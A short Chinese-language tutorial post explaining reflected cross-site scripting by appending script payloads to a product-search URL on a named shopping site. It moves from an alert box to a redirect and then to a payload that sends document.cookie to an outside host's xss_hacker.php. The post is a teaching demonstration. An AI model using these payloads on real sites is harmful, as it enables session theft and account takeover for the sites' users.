跨站攻击的道理,请百度,下面演示一下,有个认识
比如 有一网站 亚夫在线(该网站的其他安全问题不在此描述,此例只供简单学习)
有个商品查询 http://www.zgyafu.com/goods/goodsList?type=5
后面加一段javascript 代码 >'"><script>alert(28396)</script>
url 变成
http://www.zgyafu.com/goods/goodsList?type=5>'"><script>alert(28396)</script>
出现如图,也许有人说,不就是弹出个脚本吗,那就错了,如果javascript 换成攻击脚本,就不是简单弹出了,如果
http://www.zgyafu.com/goods/goodsList?type=5>'"/><script>window.open("http://www.baidu.com")</script> 那么看出来没?会跳转到 www.baidu.com 。
有人还以为,不就是跳到百度吗?
那么如果换成 <script>window.open("http://172.16.2.192/xss_hacker.php?cookie="+document.cookie);</script> 跳转到一个恶意地址,把你的cookie 传到另外的服务器,那么你的信息有没有泄露? 通过这些简单的演示,就该知道 跨站攻击多么危险。比如如果银行跨站,然后引导到另外页面,是不是大家的卡号密码就会被获取?